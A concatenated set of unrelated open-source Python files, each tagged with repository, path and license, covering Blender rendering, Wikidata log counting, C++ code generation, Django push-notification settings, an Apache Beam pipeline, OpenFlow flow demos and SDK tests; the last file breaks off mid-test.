headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return languageRest.LanguageRest(**response.json())
| cortical-io/python-client-sdk | cortical/textApi.py | Python | bsd-2-clause | 5,619 |
import bpy
import colorsys
from math import sin, cos, pi
from mathutils import Euler
TAU = 2*pi
def rainbow_lights(r=5, n=100, freq=2, energy=100):
for i in range(n):
t = float(i)/float(n)
pos = (r*sin(TAU*t), r*cos(TAU*t), r*sin(freq*TAU*t))
# Create lamp
bpy.ops.object.add(type='LIGHT', location=pos)
obj = bpy.context.object
obj.data.type = 'POINT'
# Apply gamma correction for Blender
color = tuple(pow(c, 2.2) for c in colorsys.hsv_to_rgb(t, 0.6, 1))
# Set HSV color and lamp energy
obj.data.color = color
obj.data.energy = energy
if __name__ == '__main__':
# Remove all elements
bpy.ops.object.select_all(action="SELECT")
bpy.ops.object.delete(use_global=False)
# Set cursor to (0, 0, 0)
bpy.context.scene.cursor.location = (0, 0, 0)
# Create camera
bpy.ops.object.add(type='CAMERA', location=(0, -3.0, 0))
camera = bpy.context.object
camera.data.lens = 35
camera.rotation_euler = Euler((pi/2, 0, 0), 'XYZ')
# Make this the current camera
bpy.context.scene.camera = camera
# Create lamps
rainbow_lights(5, 100, 2, energy=100)
# Create object
bpy.ops.mesh.primitive_ico_sphere_add(
location=(0,0,0),
subdivisions=3,
radius=1)
obj = bpy.context.object
# Add subsurf modifier
modifier = obj.modifiers.new('Subsurf', 'SUBSURF')
modifier.levels = 2
modifier.render_levels = 2
# Smooth surface
for p in obj.data.polygons:
p.use_smooth = True
# Add Glossy BSDF material
mat = bpy.data.materials.new('Material')
mat.use_nodes = True
node = mat.node_tree.nodes[0]
node.inputs[0].default_value = (0.8, 0.8, 0.8, 1) # Base color
node.inputs[4].default_value = 0.5 # Metalic
node.inputs[7].default_value = 0.5 # Roughness
obj.data.materials.append(mat)
# Render image
scene = bpy.context.scene
scene.render.resolution_x = 512
scene.render.resolution_y = 512
scene.render.resolution_percentage = 100
scene.render.engine = 'CYCLES'
#scene.render.engine = 'BLENDER_EEVEE'
scene.render.filepath = 'rendering/simple_sphere.png'
bpy.ops.render.render(write_still=True)
| njanakiev/blender-scripting-intro | scripts/simple_sphere.py | Python | mit | 2,273 |
import argparse
import os
import sys
from collections import defaultdict
from postprocess import processdata
from utility import utility
import config
parser = argparse.ArgumentParser(
description="Counts for a given metric how often it occurs per hour. "
+ "Creates then daily and a monthly tsv file containg the hour, the "
+ "metric and the queryCount")
parser.add_argument("metric", type=str, help="the metric which we want to "
+ "count (without #)")
parser.add_argument("--monthsFolder", "-m", default=config.monthsFolder,
type=str, help="the folder in which the months directory "
+ "are residing")
parser.add_argument("--ignoreLock", "-i", help="Ignore locked file and execute"
+ " anyways", action="store_true")
parser.add_argument("month", type=str,
help="the month which we're interested in")
if (len(sys.argv[1:]) == 0):
parser.print_help()
parser.exit()
args = parser.parse_args()
if os.path.isfile(utility.addMissingSlash(args.monthsFolder)
+ utility.addMissingSlash(args.month) + "locked") \
and not args.ignoreLock:
print "ERROR: The month " + args.month + " is being edited at the moment."
+ "Use -i if you want to force the execution of this script."
sys.exit()
class HourlyMetricCountHandler:
dailyData = dict()
monthlyData = dict()
metric = str
def __init__(self, metric):
self.metric = metric
def handle(self, sparqlQuery, processed):
if (processed['#Valid'] == 'VALID' or processed['#Valid'] == '1'):
if (processed['#day'] not in self.dailyData):
self.dailyData[processed['#day']] = dict()
if (processed['#hour'] not in self.dailyData[processed['#day']]):
self.dailyData[processed['#day']][processed['#hour']] \
= defaultdict(int)
if (processed['#hour'] not in self.monthlyData):
self.monthlyData[processed['#hour']] = defaultdict(int)
self.dailyData[processed['#day']][processed['#hour']] \
[processed['#' + self.metric]] += 1
self.monthlyData[processed['#hour']] \
[processed['#' + self.metric]] += 1
def saveToFiles(self, outputFolder):
outputFolder = outputFolder + "/"
if not os.path.exists(outputFolder + "/" + self.metric):
os.makedirs(outputFolder + "/" + self.metric)
header = "hour\t" + self.metric + "\tcount\n"
for day, data in self.dailyData.iteritems():
with open(outputFolder + self.metric + "/" + "%02d" % day
+ "ClassifiedBotsData.tsv", "w") as outputFile:
outputFile.write(header)
for hour, metricDict in data.iteritems():
for metric in metricDict.iterkeys():
outputFile.write(str(hour) + "\t" + str(metric)
+ "\t" + str(data[hour][metric])
+ "\n")
with open(outputFolder + self.metric + "/" + "TotalClassifiedBotsData.tsv",
"w") as outputFile:
outputFile.write(header)
for hour, metricDict in self.monthlyData.iteritems():
for metric in metricDict.iterkeys():
outputFile.write(str(hour) + "\t" + str(metric) + "\t"
+ str(self.monthlyData[hour][metric])
+ "\n")
handler = HourlyMetricCountHandler(args.metric)
processdata.processMonth(handler, args.month, args.monthsFolder)
print args.monthsFolder + "/" + args.month \
+ "/processedLogData/hourlyMetricCountData"
handler.saveToFiles(args.monthsFolder + "/" + args.month
+ "/processedLogData/hourlyMetricCountData")
| Wikidata/QueryAnalysis | tools/getHourlyMetricCount.py | Python | apache-2.0 | 3,940 |
from pyscp import core, utils, snapshot, wikidot | anqxyr/pyscp | pyscp/__init__.py | Python | mit | 48 |
from scope import *
class CPPCompiler:
pass
class ObjectCompiler(CPPCompiler):
def __init__(self, name):
self.parName = name + "&"
self.typeName = name
self.retName = name
self.deserial = "%s = %s.deserializeObject(inStream)" % ("%s",name)
self.serial = "cxn.serializeObject(%s, outStream)" % ("%s")
AbstractCompiler = ExceptionCompiler = ObjectCompiler
class RawTypeCompiler(CPPCompiler):
""" Compiler for raw types, available natively in C++.
This class encapsulates the compilation of those types which will
be addressed in parameter lists as their raw C++ type.
"""
def __init__(self, name, nativeName, argByReference):
self.parName = nativeName + "&" if argByReference else ""
self.typeName = nativeName
self.retName = nativeName
self.deserial = "%s = %s::readFrom(inStream)" % ("%s", name)
self.serial = "%s::writeTo(%s, outStream)" % (name, "%s")
def buildBaseMap():
serviceObjectTypes = [
"URI", "ConnectionID", "BusID", "RouteToken",
"ObjectID", "TransverseID", "Reference", "MessageID"]
typeTranslation = dict(
Int8 = ("int8_t", False),
Int16 = ("int16_t", False),
Int32 = ("int32_t", False),
Int64 = ("int64_t", False),
UInt8 = ("uint8_t", False),
UInt16 = ("uint16_t", False),
UInt32 = ("uint32_t", False),
UInt64 = ("uint64_t", False),
ASCIIString = ("std::string", True),
ByteString = ("std::vector<uint8_t>", True),
UnicodeString = ("std::wstring", True))
builtinTypeMap = {}
for key, (value, ref) in typeTranslation.items():
compiler = RawTypeCompiler(key, value, ref)
builtinTypeMap[key] = BasicType(key, compiler)
for name in serviceObjectTypes:
compiler = ObjectCompiler(name)
builtinTypeMap[name] = BasicType(name, compiler)
compiler = ObjectCompiler("!!TODO!!")
builtinTypeMap["GetMyConnection"] = ComplexType(name, compiler)
return builtinTypeMap
def buildOutput(processed, oHandle):
oHandle.write("#include <ripley/service>\n")
# Write out abstract classes
for abstract in processed.abstract:
outputAbstract(abstract, oHandle)
for classDef in processed.classes:
outputClassBase(classDef, oHandle)
def outputAbstract(abstract, oHandle):
""" Write out the class definition of an 'abstract class'.
An abstract class is a serializable type which can be passed by
reference but admits no interface whatsoever. Basically allows
a 'local' object to be passed back and forth inside a blackbox.
"""
string = ("class %s : public PassByReference {\n"
"protected:\n"
"\tvirtual void __abstractClassKludge() override {};\n"
"};\n\n")
pars = (abstract.name,)
oHandle.write(string%pars)
def outputClassBase(classDef, oHandle):
substring = ["class %sProxy;\n\n"
"class %s : public PassByReference {\n"
"public:\n"
"\ttypedef %sProxy ProxyClass;\n"]
pars = (classDef.name,) * 3
for method in classDef.methods:
substring.append(formatMethodPrototype(method))
substring.append("protected:\n")
substring.append("\tvirtual void __abstractClassKludge() override {};\n")
substring.append("};\n\n")
oHandle.write("".join(substring) % pars)
def formatMethodPrototype(method):
string = "\tvirtual %s %s(%s) = 0;\n"
if isinstance(method, Evaluation):
build = []
if len(method.returns) > 1:
for _,parType in method.returns:
build.append(parType.compiler.retName)
retString = "std::tuple<" + ",".join(build) + ">"
elif len(method.returns) == 1:
retString = method.returns[0][1].compiler.retName
else:
retString = "void"
else:
retString = "void"
build = []
for _,parType in method.params:
build.append(parType.compiler.parName)
parString = ", ".join(build)
return string % (retString, method.name, parString)
| disnesquick/ripley | codegen/cpp.py | Python | gpl-2.0 | 3,787 |
from django.core.exceptions import ImproperlyConfigured
from django.utils.six import string_types
from ..settings import PUSH_NOTIFICATIONS_SETTINGS as SETTINGS
from .base import BaseConfig
__all__ = [
"LegacyConfig"
]
class empty(object):
pass
class LegacyConfig(BaseConfig):
def _get_application_settings(self, application_id, settings_key, error_message):
"""Legacy behaviour"""
if not application_id:
value = SETTINGS.get(settings_key, empty)
if value is empty:
raise ImproperlyConfigured(error_message)
return value
else:
msg = (
"LegacySettings does not support application_id. To enable "
"multiple application support, use push_notifications.conf.AppSettings."
)
raise ImproperlyConfigured(msg)
def get_gcm_api_key(self, application_id=None):
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["GCM_API_KEY"] to send messages through GCM.'
)
return self._get_application_settings(application_id, "GCM_API_KEY", msg)
def get_fcm_api_key(self, application_id=None):
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["FCM_API_KEY"] to send messages through FCM.'
)
return self._get_application_settings(application_id, "FCM_API_KEY", msg)
def get_post_url(self, cloud_type, application_id=None):
key = "{}_POST_URL".format(cloud_type)
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["{}"] to send messages through {}.'.format(
key, cloud_type
)
)
return self._get_application_settings(application_id, key, msg)
def get_error_timeout(self, cloud_type, application_id=None):
key = "{}_ERROR_TIMEOUT".format(cloud_type)
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["{}"] to send messages through {}.'.format(
key, cloud_type
)
)
return self._get_application_settings(application_id, key, msg)
def get_max_recipients(self, cloud_type, application_id=None):
key = "{}_MAX_RECIPIENTS".format(cloud_type)
msg = (
'Set PUSH_NOTIFICATIONS_SETTINGS["{}"] to send messages through {}.'.format(
key, cloud_type
)
)
return self._get_application_settings(application_id, key, msg)
def get_apns_certificate(self, application_id=None):
r = self._get_application_settings(
application_id, "APNS_CERTIFICATE",
"You need to setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
)
if not isinstance(r, string_types):
# probably the (Django) file, and file path should be got
if hasattr(r, "path"):
return r.path
elif (hasattr(r, "has_key") or hasattr(r, "__contains__")) and "path" in r:
return r["path"]
else:
msg = (
"The APNS certificate settings value should be a string, or "
"should have a 'path' attribute or key"
)
raise ImproperlyConfigured(msg)
return r
def get_apns_use_sandbox(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_USE_SANDBOX", msg)
def get_apns_use_alternative_port(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_USE_ALTERNATIVE_PORT", msg)
def get_apns_topic(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_TOPIC", msg)
def get_apns_host(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_HOST", msg)
def get_apns_port(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_PORT", msg)
def get_apns_feedback_host(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_FEEDBACK_HOST", msg)
def get_apns_feedback_port(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "APNS_FEEDBACK_PORT", msg)
def get_wns_package_security_id(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WNS_PACKAGE_SECURITY_ID", msg)
def get_wns_secret_key(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WNS_SECRET_KEY", msg)
def get_wp_post_url(self, application_id, browser):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WP_POST_URL", msg)[browser]
def get_wp_private_key(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WP_PRIVATE_KEY", msg)
def get_wp_claims(self, application_id=None):
msg = "Setup PUSH_NOTIFICATIONS_SETTINGS properly to send messages"
return self._get_application_settings(application_id, "WP_CLAIMS", msg)
| matthewh/django-push-notifications | push_notifications/conf/legacy.py | Python | mit | 5,166 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A workflow emitting the top k most common words for each prefix."""
from __future__ import absolute_import
import argparse
import logging
import re
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.utils.pipeline_options import PipelineOptions
from apache_beam.utils.pipeline_options import SetupOptions
def run(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('--input',
required=True,
help='Input file to process.')
parser.add_argument('--output',
required=True,
help='Output file to write results to.')
known_args, pipeline_args = parser.parse_known_args(argv)
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = True
p = beam.Pipeline(options=pipeline_options)
(p # pylint: disable=expression-not-assigned
| 'read' >> ReadFromText(known_args.input)
| 'split' >> beam.FlatMap(lambda x: re.findall(r'[A-Za-z\']+', x))
| 'TopPerPrefix' >> TopPerPrefix(5)
| 'format' >> beam.Map(
lambda (prefix, candidates): '%s: %s' % (prefix, candidates))
| 'write' >> WriteToText(known_args.output))
p.run()
class TopPerPrefix(beam.PTransform):
def __init__(self, count):
super(TopPerPrefix, self).__init__()
self._count = count
def expand(self, words):
"""Compute the most common words for each possible prefixes.
Args:
words: a PCollection of strings
Returns:
A PCollection of most common words with each prefix, in the form
(prefix, [(count, word), (count, word), ...])
"""
return (words
| beam.combiners.Count.PerElement()
| beam.FlatMap(extract_prefixes)
| beam.combiners.Top.LargestPerKey(self._count))
def extract_prefixes((word, count)):
for k in range(1, len(word) + 1):
prefix = word[:k]
yield prefix, (count, word)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| jasonkuster/beam | sdks/python/apache_beam/examples/complete/autocomplete.py | Python | apache-2.0 | 3,029 |
"""Constants.
From pygame:
QUIT
MOUSEBUTTONDOWN
MOUSEBUTTONUP
MOUSEMOTION
KEYDOWN
PGU specific:
ENTER
EXIT
BLUR
FOCUS
CLICK
CHANGE
OPEN
CLOSE
INIT
Other:
NOATTR
"""
import pygame
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION, KEYDOWN, USEREVENT
ENTER = pygame.locals.USEREVENT + 0
EXIT = pygame.locals.USEREVENT + 1
BLUR = pygame.locals.USEREVENT + 2
FOCUS = pygame.locals.USEREVENT + 3
CLICK = pygame.locals.USEREVENT + 4
CHANGE = pygame.locals.USEREVENT + 5
OPEN = pygame.locals.USEREVENT + 6
CLOSE = pygame.locals.USEREVENT + 7
INIT = 'init'
class NOATTR:
pass
| smathot/opensesame_questionnaire_plugins | multiple_choice/pgu/gui/const.py | Python | gpl-2.0 | 619 |
#!/usr/bin/python
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
"""
import time
from pybvc.controller.controller import Controller
from pybvc.openflowdev.ofswitch import (OFSwitch,
FlowEntry,
Match,
Instruction,
SetNwSrcAction,
SetNwDstAction,
SetTpSrcAction,
SetTpDstAction,
SetFieldAction,
OutputAction)
from pybvc.common.utils import load_dict_from_file
from pybvc.common.status import STATUS
from pybvc.common.constants import (ETH_TYPE_IPv4,
IP_PROTO_TCP,
IP_PROTO_UDP)
def delete_flows(ofswitch, table_id, flow_ids):
for flow_id in flow_ids:
result = ofswitch.delete_flow(table_id, flow_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow with id of '%s' successfully removed "
"from the Controller" % flow_id)
else:
print ("!!!Flow '%s' removal error, reason: %s" %
(flow_id, status.brief()))
def of_demo_40():
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit(0)
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo 40 Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
ofswitch = OFSwitch(ctrl, nodeName)
print ("<<< 'Controller': %s, 'OpenFlow' switch: '%s'" %
(ctrlIpAddr, nodeName))
first_flow_id = 110
# ---------------------------------------------------
# First flow entry
# ---------------------------------------------------
table_id = 0
flow_id = first_flow_id
flow_name = "Modify IP packet example1"
priority = 900
cookie = 1300
match_in_port = 10
match_eth_type = ETH_TYPE_IPv4
match_ip_proto = IP_PROTO_TCP
match_ipv4_src_addr = "192.1.2.0/24"
match_ipv4_dst_addr = "173.194.123.40/32"
match_tcp_dst_port = 8080
act_mod_ipv4_src_addr = "212.16.1.8/32"
act_mod_ipv4_dst_addr = "52.87.12.11/32"
act_mod_tcp_src_port = 8888
act_mod_tcp_dst_port = 9999
act_out_port = 119
print "\n"
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" IP Protocol (%s)\n"
" IPv4 Source Address (%s)\n"
" IPv4 Destination Address (%s)\n"
" TCP Destination Port (%s)" %
(match_in_port,
hex(match_eth_type),
match_ip_proto,
match_ipv4_src_addr,
match_ipv4_dst_addr,
match_tcp_dst_port))
print (" Actions: Modify IPv4 Source Address (%s)\n"
" Modify IPv4 Destination Address (%s)\n"
" Modify TCP Source Port (%s)\n"
" Modify TCP Destination Port (%s)\n"
" Output (%s)" %
(act_mod_ipv4_src_addr,
act_mod_ipv4_dst_addr,
act_mod_tcp_src_port,
act_mod_tcp_dst_port,
act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry1 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry1.set_flow_table_id(table_id)
flow_entry1.set_flow_name(flow_name)
flow_entry1.set_flow_id(flow_id)
flow_entry1.set_flow_cookie(cookie)
flow_entry1.set_flow_priority(priority)
flow_entry1.set_flow_hard_timeout(0)
flow_entry1.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = SetNwSrcAction(action_order)
action.set_nw_src(act_mod_ipv4_src_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetNwDstAction(action_order)
action.set_nw_dst(act_mod_ipv4_dst_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetTpSrcAction(action_order)
action.set_tp_src(act_mod_tcp_src_port)
instruction.add_apply_action(action)
action_order += 1
action = SetTpDstAction(action_order)
action.set_tp_dst(act_mod_tcp_dst_port)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry1.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_ip_proto(match_ip_proto)
match.set_ipv4_src(match_ipv4_src_addr)
match.set_ipv4_dst(match_ipv4_dst_addr)
match.set_tcp_dst(match_tcp_dst_port)
flow_entry1.add_match(match)
print ("\n")
print ("<<< Flow to send:")
print flow_entry1.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry1)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
# ---------------------------------------------------
# Second flow entry
# ---------------------------------------------------
table_id = 0
flow_id += 1
flow_name = "Modify IP packet example2"
priority = 900
cookie = 1300
match_in_port = 110
match_eth_type = ETH_TYPE_IPv4
match_ip_proto = IP_PROTO_UDP
match_ipv4_src_addr = "10.1.0.0/16"
match_ipv4_dst_addr = "168.1.1.101/32"
match_udp_dst_port = 1812
act_mod_ipv4_src_addr = "172.101.1.9/32"
act_mod_ipv4_dst_addr = "172.101.1.1/32"
act_mod_udp_src_port = 5555
act_mod_udp_dst_port = 7777
act_out_port = 120
print "\n"
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" IP Protocol (%s)\n"
" IPv4 Source Address (%s)\n"
" IPv4 Destination Address (%s)\n"
" UDP Destination Port (%s)" %
(match_in_port,
hex(match_eth_type),
match_ip_proto,
match_ipv4_src_addr,
match_ipv4_dst_addr,
match_udp_dst_port))
print (" Actions: Set Field (IPv4 Source Address %s)\n"
" Set Field (IPv4 Destination Address %s)\n"
" Set Field (UDP Source Port %s)\n"
" Set Field (UDP Destination Port %s)\n"
" Output (%s)" %
(act_mod_ipv4_src_addr,
act_mod_ipv4_dst_addr,
act_mod_udp_src_port,
act_mod_udp_dst_port,
act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry2 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry2.set_flow_table_id(table_id)
flow_entry2.set_flow_name(flow_name)
flow_entry2.set_flow_id(flow_id)
flow_entry2.set_flow_cookie(cookie)
flow_entry2.set_flow_priority(priority)
flow_entry2.set_flow_hard_timeout(0)
flow_entry2.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = SetFieldAction(action_order)
action.set_ipv4_src(act_mod_ipv4_src_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetFieldAction(action_order)
action.set_ipv4_dst(act_mod_ipv4_dst_addr)
instruction.add_apply_action(action)
action_order += 1
action = SetFieldAction(action_order)
action.set_udp_src(act_mod_udp_src_port)
instruction.add_apply_action(action)
action_order += 1
action = SetFieldAction(action_order)
action.set_udp_dst(act_mod_udp_dst_port)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry2.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_ip_proto(match_ip_proto)
match.set_ipv4_src(match_ipv4_src_addr)
match.set_ipv4_dst(match_ipv4_dst_addr)
match.set_udp_dst(match_udp_dst_port)
flow_entry2.add_match(match)
print ("\n")
print ("<<< Flow to send:")
print flow_entry2.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry2)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
print ("\n")
print ("<<< Delete flows from the Controller's cache "
"and from the table '%s' on the '%s' node" % (table_id, nodeName))
time.sleep(rundelay)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
print ("\n")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
of_demo_40()
| jebpublic/pybvc | samples/sampleopenflow/demos/demo40.py | Python | bsd-3-clause | 11,998 |
#!/usr/bin/env python
"""Convert fastq to fasta
Usage:
python fastq_to_fastq.py inputfile outputfile proportion
Where:
inputfile is a fastq or fastq.gz file
outputfile is a fastq or fastq.gz file to output to
proportion is the proportion of converted Ts
"""
# Modules
import sys
import gzip
import random
from Bio import SeqIO
try:
infile = sys.argv[1]
outfile = sys.argv[2]
proportion = float(sys.argv[3])
except:
print __doc__
sys.exit(1)
# Functions
def myopen(_file, mode="r"):
if _file.endswith(".gz"):
return gzip.open(_file, mode=mode)
else:
return open(_file, mode=mode)
# Main
sequences = (s for s in (SeqIO.parse(myopen(infile), "fastq")))
with myopen(outfile, "w") as outf:
for s in sequences:
fastq = s.format("fastq").strip().split("\n")
converted = list(fastq[1])
end = len(converted)
if "".join(converted[-3:]) == "CCG":
end = len(converted) - 3
for i in xrange(3, end):
if converted[i] == "T" and proportion > random.random():
converted[i] = "C"
fastq[1] = "".join(converted)
outf.write("\n".join(fastq) + "\n")
| wkh124/wkh124 | fastq_rrbs_convert.py | Python | gpl-3.0 | 1,200 |
# coding:utf-8
'''
created on 2018/2/24
@author:sunyihuan
'''
import tensorflow as tf
import os
from tensorflow.python.tools import inspect_checkpoint as chkp
logdir = '/Users/sunyihuan/Desktop/孙义环/mnist-model/mnist_data'
# chkp.print_tensors_in_checkpoint_file(logdir+'/model_epoch_0008_step_3860',tensor_name='PrimaryCaps_layer/Conv/weights',all_tensors=False)
tt=os.listdir(logdir)
with tf.Session() as sess:
# saver = tf.train.Saver()
print(tf.train.latest_checkpoint(logdir))
saver = tf.train.import_meta_graph(logdir+'/model_epoch_0008_step_3860.meta')
saver.restore(sess,logdir+'/model_epoch_0008_step_3860')
graph = tf.get_default_graph()
print(graph.get_operations())
for g in graph.get_operations():
print(g.name)
print(tf.import_graph_def())
| sunyihuan326/DeltaLab | mnist/model.py | Python | mit | 803 |
from betamax import Betamax
import sys
from currencycloud import Client, Config
from currencycloud.resources import *
def is_string(s):
if sys.version_info[0] < 3:
return isinstance(s, basestring)
else:
return isinstance(s, str)
class TestActions:
beneficiary_id = None
beneficiary_first_id = None
beneficiary_params = {
'beneficiary_entity_type': 'individual',
'beneficiary_first_name': 'Dr.',
'beneficiary_last_name': 'Who',
'beneficiary_address': ['Address 42'],
'beneficiary_city': 'The Citadel',
'beneficiary_postcode': '42424',
'beneficiary_country': 'GB',
'bank_account_holder_name': 'Test User',
'bank_country': 'GB',
'currency': 'GBP',
'name': 'Test User Nick',
'account_number': '41854372',
'routing_code_type_1': 'aba',
'routing_code_value_1': '123456780',
'routing_code_type_2': 'sort_code',
'routing_code_value_2': '400730',
'payment_types': ['priority', 'regular']
}
def setup_method(self, method):
# TODO: To run against real server please delete ../fixtures/vcr_cassettes/* and replace
# login_id and api_key with valid credentials before running the tests
login_id = '[email protected]'
api_key = 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef'
environment = Config.ENV_DEMO
self.client = Client(login_id, api_key, environment)
def test_actions_can_create(self):
with Betamax(self.client.config.session) as betamax:
betamax.use_cassette('actions/can_create')
beneficiary = self.client.beneficiaries.create(**TestActions.beneficiary_params)
TestActions.beneficiary_id = beneficiary.id
assert isinstance(beneficiary, Beneficiary)
assert beneficiary.id
assert beneficiary.created_at
assert beneficiary.updated_at
assert beneficiary.created_at == beneficiary.updated_at
for k, v in TestActions.beneficiary_params.items():
if k in ('routing_code_type_1', 'routing_code_value_1'):
# skip fields with wrong values that are cleaned up by the
# API
continue
b = beneficiary[k]
